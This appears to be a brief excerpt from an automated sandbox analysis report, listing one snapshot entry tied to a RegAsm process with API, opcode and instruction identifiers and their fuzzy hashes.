                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                        • Opcode ID: 22d8c10915a1089abb7025fdaadd258d994528d2c3d404de0e049a109cb19bea
                                                                                                                                                        • Instruction ID: f2f3227e13a1bca6ad32c385139139657eb7437fc117f199cc477aae5c85099f
                                                                                                                                                        • Opcode Fuzzy Hash: 22d8c10915a1089abb7025fdaadd258d994528d2c3d404de0e049a109cb19bea
                                                                                                                                                        • Instruction Fuzzy Hash: FFF0F9B27012016BE7109A18E8C495773A9EF4135CBB00035EA16D3B01E332F929C6AE